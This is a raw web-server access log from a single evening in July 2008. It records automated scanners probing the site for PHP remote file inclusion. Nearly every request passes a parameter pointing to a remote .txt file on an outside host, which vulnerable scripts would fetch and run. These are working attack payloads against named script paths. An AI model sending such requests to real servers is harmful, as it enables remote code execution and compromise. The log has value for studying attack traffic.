84.21.71.133 - - [31/Jul/2008:19:36:12 -0700] "GET /logs/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
84.21.71.133 - - [31/Jul/2008:19:36:12 -0700] "GET /logs/access_080601.log/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
201.55.48.7 - - [31/Jul/2008:19:37:06 -0700] "GET /logs/access_080701.log/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
201.55.48.7 - - [31/Jul/2008:19:37:06 -0700] "GET /errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
201.55.48.7 - - [31/Jul/2008:19:37:07 -0700] "GET /logs/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
72.248.189.82 - - [31/Jul/2008:19:38:05 -0700] "GET /logs/access_080601.log//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
72.248.189.82 - - [31/Jul/2008:19:38:05 -0700] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
72.248.189.82 - - [31/Jul/2008:19:38:05 -0700] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
201.55.48.7 - - [31/Jul/2008:19:38:09 -0700] "GET /logs/access_080701.log/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
201.55.48.7 - - [31/Jul/2008:19:38:09 -0700] "GET /errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
201.55.48.7 - - [31/Jul/2008:19:38:09 -0700] "GET /logs/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
216.240.139.9 - - [31/Jul/2008:19:40:49 -0700] "GET /intelligent/vehicle.html HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible ; MSIE 6.0; Windows NT 5.1)" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:42:10 -0700] "GET /logs/access.log/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:42:10 -0700] "GET /include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
92.56.99.197 - - [31/Jul/2008:19:42:11 -0700] "GET /logs/include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.dogshop.at/poll/romid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
72.248.189.82 - - [31/Jul/2008:19:48:09 -0700] "GET /logs/access_080601.log/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
72.248.189.82 - - [31/Jul/2008:19:48:09 -0700] "GET /logs/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
72.248.189.82 - - [31/Jul/2008:19:48:10 -0700] "GET /admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
204.15.10.22 - - [31/Jul/2008:19:56:48 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.symis.net"
204.15.10.22 - - [31/Jul/2008:19:56:48 -0700] "GET //skin/zero_vote/error.php?dir=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.symis.net"
62.169.0.50 - - [31/Jul/2008:19:57:15 -0700] "GET //skin/zero_vote/error.php?dir=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.symis.net"
62.169.0.50 - - [31/Jul/2008:19:57:15 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dantman.com/.../rid????? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.symis.net"
216.255.182.66 - - [31/Jul/2008:20:02:06 -0700] "GET /logs/access_080531.log HTTP/1.1" 206 262144 "http://www.example.com/" "libwww-perl/5.805" "www.symis.net"
82.165.43.63 - - [31/Jul/2008:20:06:29 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
82.165.43.63 - - [31/Jul/2008:20:06:29 -0700] "GET //skin/zero_vote/error.php?dir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
82.165.43.63 - - [31/Jul/2008:20:06:30 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
218.188.33.2 - - [31/Jul/2008:20:07:01 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.symis.net"
218.188.33.2 - - [31/Jul/2008:20:07:01 -0700] "GET //skin/zero_vote/error.php?dir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.symis.net"
218.188.33.2 - - [31/Jul/2008:20:07:02 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.symis.net"
218.188.33.2 - - [31/Jul/2008:20:08:14 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.symis.net"
212.72.200.170 - - [31/Jul/2008:20:08:43 -0700] "GET /logs/access_080701.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
212.72.200.170 - - [31/Jul/2008:20:08:45 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
212.72.200.170 - - [31/Jul/2008:20:08:47 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
82.165.43.63 - - [31/Jul/2008:20:09:23 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://dantman.com/.../rid??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
210.87.251.41 - - [31/Jul/2008:20:09:50 -0700] "GET /logs/access_080601.log///vwar/backup/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
210.87.251.43 - - [31/Jul/2008:20:09:51 -0700] "GET ///vwar/backup/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
210.87.251.43 - - [31/Jul/2008:20:09:51 -0700] "GET /logs///vwar/backup/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.0" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
72.249.108.180 - - [31/Jul/2008:20:10:44 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
72.249.108.180 - - [31/Jul/2008:20:14:19 -0700] "GET /logs/access_080701.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
72.249.108.180 - - [31/Jul/2008:20:14:19 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
72.249.108.180 - - [31/Jul/2008:20:14:19 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kograko.com.pl/poll/polldata/readme1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
87.226.77.5 - - [31/Jul/2008:20:18:55 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://d35m0.net46.net/Sources/.bin/spread.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.symis.net"
87.226.77.5 - - [31/Jul/2008:20:18:55 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://d35m0.net46.net/Sources/.bin/spread.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.symis.net"
70.88.226.121 - - [31/Jul/2008:20:20:52 -0700] "GET /logs/errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
70.88.226.121 - - [31/Jul/2008:20:20:53 -0700] "GET /errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
208.68.3.10 - - [31/Jul/2008:20:21:22 -0700] "GET /logs/access_080701.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
208.68.3.10 - - [31/Jul/2008:20:21:24 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
208.68.3.10 - - [31/Jul/2008:20:21:24 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.kograko.com.pl/poll/polldata/help01[1].txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:06 -0700] "GET /logs/access_080701.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:06 -0700] "GET /logs/access_080701.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:06 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:06 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:07 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:07 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:07 -0700] "GET /logs/access_080701.log//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:08 -0700] "GET //newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
210.245.87.117 - - [31/Jul/2008:20:22:08 -0700] "GET /logs//newspublish/include.php?path%5Bdocroot%5D=http://www.cafelecaire.com/gallery/data/mraneti.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
201.55.48.7 - - [31/Jul/2008:20:32:35 -0700] "GET /logs///vwar/backup/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
201.55.48.7 - - [31/Jul/2008:20:32:35 -0700] "GET ///vwar/backup/errors.php?error=http://gezonder.nl//txt/idnews.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
87.226.77.5 - - [31/Jul/2008:20:35:45 -0700] "GET /logs//vwar/convert/mvcw.php?step=http://d35m0.net46.net/Sources/.bin/spread.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.symis.net"
87.226.77.5 - - [31/Jul/2008:20:35:45 -0700] "GET //vwar/convert/mvcw.php?step=http://d35m0.net46.net/Sources/.bin/spread.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6" "www.symis.net"
125.24.43.22 - - [31/Jul/2008:20:35:50 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
200.31.206.138 - - [31/Jul/2008:20:38:09 -0700] "GET /logs/access_080701.log/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
200.31.206.138 - - [31/Jul/2008:20:38:12 -0700] "GET /errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
200.31.206.138 - - [31/Jul/2008:20:38:16 -0700] "GET /logs/errors.php?error=http://201.70.9.109/echo2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
70.88.226.121 - - [31/Jul/2008:20:38:37 -0700] "GET /logs/access_080601.log/errors.php?error=http://www.l2reloaded.org/robots.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
89.111.173.117 - - [31/Jul/2008:20:44:23 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [31/Jul/2008:20:44:23 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.173.117 - - [31/Jul/2008:20:44:24 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
212.72.200.170 - - [31/Jul/2008:20:46:46 -0700] "GET /errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
212.72.200.170 - - [31/Jul/2008:20:46:48 -0700] "GET /logs/errors.php?error=http://201.70.9.109/www????????????????????????????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:20:55:16 -0700] "GET /logs/access_080701.log//admin/spaw/spaw_control.class.php?spaw_root=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:20:55:16 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
213.254.226.234 - - [31/Jul/2008:20:55:17 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://www.dpfbrasil.net63.net/i.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
125.24.43.22 - - [31/Jul/2008:20:58:43 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
125.24.43.22 - - [31/Jul/2008:20:59:18 -0700] "GET /logs/access_080701.log/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
125.24.43.22 - - [31/Jul/2008:20:59:25 -0700] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
125.24.43.22 - - [31/Jul/2008:20:59:28 -0700] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.hvn.es/aplicaciones/contratacion2/mbtPdfAsm/out/deflate.o.LCK?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:21:03:00 -0700] "GET /logs/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:21:03:00 -0700] "GET /errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:21:03:00 -0700] "GET /logs/access_080701.log/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
193.233.85.46 - - [31/Jul/2008:21:05:02 -0700] "GET /logs/access_080701.log//include.php?path[docroot]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.symis.net"
193.233.85.46 - - [31/Jul/2008:21:05:02 -0700] "GET /logs//include.php?path[docroot]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:21:10:37 -0700] "GET /logs/access_080601.log///vwar/backup/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:21:10:37 -0700] "GET /logs///vwar/backup/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
67.19.204.226 - - [31/Jul/2008:21:10:37 -0700] "GET ///vwar/backup/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
74.6.22.164 - - [31/Jul/2008:21:16:31 -0700] "GET /logs/ HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.symis.net"
74.6.22.164 - - [31/Jul/2008:21:19:38 -0700] "GET /logs/access_080801.log HTTP/1.0" 200 375856 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.symis.net"
89.111.172.23 - - [31/Jul/2008:21:22:08 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
67.15.8.80 - - [31/Jul/2008:21:25:29 -0700] "GET //?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 647 "-" "libwww-perl/5.65" "www.symis.net"
67.15.8.80 - - [31/Jul/2008:21:25:29 -0700] "GET /logs/access_080701.log//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
67.15.8.80 - - [31/Jul/2008:21:25:48 -0700] "GET /logs//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 200 2373 "-" "libwww-perl/5.65" "www.symis.net"
201.36.250.17 - - [31/Jul/2008:21:26:21 -0700] "GET /errors.php?error=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.symis.net"
201.36.250.17 - - [31/Jul/2008:21:26:21 -0700] "GET /logs/access_080701.log/errors.php?error=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.symis.net"
201.36.250.17 - - [31/Jul/2008:21:26:21 -0700] "GET /logs/errors.php?error=http://aaa-hack.fateback.com/id2.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.symis.net"
67.15.8.80 - - [31/Jul/2008:21:30:15 -0700] "GET /logs/access_080531.log//?path%5Bdocroot%5D=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.symis.net"
74.52.239.114 - - [31/Jul/2008:21:32:02 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
74.52.239.114 - - [31/Jul/2008:21:32:02 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
74.52.239.114 - - [31/Jul/2008:21:32:03 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://arabhack.fateback.com/kngid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.symis.net"
89.111.172.23 - - [31/Jul/2008:21:35:14 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
89.111.172.23 - - [31/Jul/2008:21:35:14 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/bajo.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
193.233.85.46 - - [31/Jul/2008:21:36:03 -0700] "GET /logs/access_080531.log//include.php?path[docroot]=http://uaedesign.com/config/idfx.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl-NL; rv:1.7.5) Gecko/20041202 Firefox/1.0" "www.symis.net"
59.188.7.232 - - [31/Jul/2008:21:52:41 -0700] "GET /logs/access.log//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
59.188.7.232 - - [31/Jul/2008:21:52:42 -0700] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
59.188.7.232 - - [31/Jul/2008:21:52:42 -0700] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.steelselect.com/ips.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:00:41 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:00:41 -0700] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:00:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:00:42 -0700] "GET //skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:00:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:00:42 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:01:40 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
77.232.84.155 - - [31/Jul/2008:22:01:40 -0700] "GET /logs/access_080531.log//skin/zero_vote/error.php?dir=http://www.needvisa.net/newsblog_s//nucleus/libs/r.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:06:02 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:07:21 -0700] "GET /logs/ HTTP/1.0" 200 2352 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:07:51 -0700] "GET /logs/access_080331.log HTTP/1.0" 200 16143 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
67.195.37.186 - - [31/Jul/2008:22:08:42 -0700] "GET /logs/access_080301.log HTTP/1.0" 200 270304 "-" "Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.4) Gecko/20080721 BonEcho/2.0.0.4" "www.symis.net"
